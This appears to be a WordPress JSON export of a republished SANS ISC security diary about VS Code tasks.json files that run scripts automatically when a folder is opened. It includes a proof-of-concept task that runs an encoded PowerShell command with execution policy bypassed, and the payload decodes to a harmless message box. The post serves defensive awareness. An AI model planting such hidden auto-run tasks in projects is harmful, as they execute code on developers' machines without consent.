{"id":723,"date":"2026-01-21T10:01:27","date_gmt":"2026-01-21T10:01:27","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/"},"modified":"2026-01-21T10:01:27","modified_gmt":"2026-01-21T10:01:27","slug":"automatic-script-execution-in-visual-studio-code-wed-jan-21st","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/","title":{"rendered":"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st)"},"content":{"rendered":"
\n

Visual Studio Code is a popular open-source code editor[1<\/a>]. But it\u2019s much more than a simple editor, it\u2019s a complete development platform\u00a0that supports many languages and it is available on multiple platforms. Used by developers worldwide, it\u2019s a juicy target for threat actors because it can be extended with extensions.<\/p>\n

Of course, it became a new playground for bad guys and malicious extensions were already discovered multiple times, like the ‘Dracula Official’ theme[2<\/a>]. Their modus-operandi is always the same: they take the legitimate extension and include scripts that perform malicious actions.<\/p>\n

VSCode has also many features that help developers in their day to day job. One of them is the execution of automatic tasks on specific events. Think about the automatic macro execution in Microsoft Office.<\/p>\n

With VSCode, it\u2019s easy to implement and it\u2019s based on a simple JSON file. Create in your project directory a sub-directory “.vscode” and, inside this one, create a \u201ctasks.json\u201d. Here is an example:<\/p>\n

\nPS C:tempMyProject> cat ..vscodetasks.json\n{\n  \"version\": \"2.0.0\",\n  \"tasks\": [\n    {\n      \"label\": \u201cISC PoC,\n      \"type\": \"shell\",\n      \"command\": \"powershell\",\n      \"args\": [\n        \"-NoProfile\",\n        \"-ExecutionPolicy\", \"Bypass\",\n        \"-EncodedCommand\",\n      \"QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAEYAcgBhAG0AZQB3AG8AcgBrADsAIABbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQAgAGEAbQAgAG4AbwB0ACAAbQBhAGwAaQBjAGkAbwB1AHMAIQAgAH0AOgAtAD4AJwAsACAAJwBJAFMAQwAgAFAAbwBDACcAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA\"\n      ],\n      \"problemMatcher\": [],\n      \"runOptions\": {\n        \"runOn<\/span>\": \"folderOpen<\/span>\"\n      },\n    }\n  ]\n}<\/pre>\n
The key element in this JSON file is the “runOn” method: The script will be triggered when the folder will be opened by VSCode.<\/p>\n
If you see some Base64 encode stuff, you can imagine that some obfuscation is in place. Now, launch VSCode from the project directory and you should see this:<\/p>\n
\"\"<\/p>\n
The Base64 data is just this code:<\/p>\n
\nAdd-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('I am not malicious! }:->', 'ISC PoC') | Out-Null<\/pre>\n
This technique has already been implemented by some threat actors![3<\/a>]!<\/p>\n
Be careful if you see some unexpected “.vscode” directories!<\/p>\n
[1] https:\/\/code.visualstudio.com<\/a>
\n[2] https:\/\/www.bleepingcomputer.com\/news\/security\/malicious-vscode-extensions-with-millions-of-installs-discovered\/<\/a>
\n[3] https:\/\/redasgard.com\/blog\/hunting-lazarus-contagious-interview-c2-infrastructure<\/a><\/p>\n
Xavier Mertens (@xme)
\nXameco
\nSenior ISC Handler – Freelance Cyber Security Consultant
\nPGP Key<\/a><\/p>\n
 (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"
Visual Studio Code is a popular open-source code editor[1]. But it\u2019s much more than a simple editor, it\u2019s a complete development platform\u00a0that supports many languages and it is available on multiple platforms. Used by developers worldwide, it\u2019s a juicy target for threat actors because it can be extended with extensions. Of course, it became a […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-723","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"\nAutomatic Script Execution In Visual Studio Code, (Wed, Jan 21st) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"Visual Studio Code is a popular open-source code editor[1]. But it\u2019s much more than a simple editor, it\u2019s a complete development platform\u00a0that supports many languages and it is available on multiple platforms. Used by developers worldwide, it\u2019s a juicy target for threat actors because it can be extended with extensions. Of course, it became a […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-21T10:01:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st)\",\"datePublished\":\"2026-01-21T10:01:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/\"},\"wordCount\":300,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/\",\"name\":\"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png\",\"datePublished\":\"2026-01-21T10:01:27+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage\",\"url\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png\",\"contentUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/","og_locale":"en_US","og_type":"article","og_title":"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st) - Imperative Business Ventures Limited","og_description":"Visual Studio Code is a popular open-source code editor[1]. But it\u2019s much more than a simple editor, it\u2019s a complete development platform\u00a0that supports many languages and it is available on multiple platforms. Used by developers worldwide, it\u2019s a juicy target for threat actors because it can be extended with extensions. Of course, it became a […]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-01-21T10:01:27+00:00","og_image":[{"url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st)","datePublished":"2026-01-21T10:01:27+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/"},"wordCount":300,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png","keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/","name":"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png","datePublished":"2026-01-21T10:01:27+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#primaryimage","url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png","contentUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260121-1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/21\/automatic-script-execution-in-visual-studio-code-wed-jan-21st\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Automatic Script Execution In Visual Studio Code, (Wed, Jan 21st)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/723","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=723"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/723\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=723"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=723"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=723"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}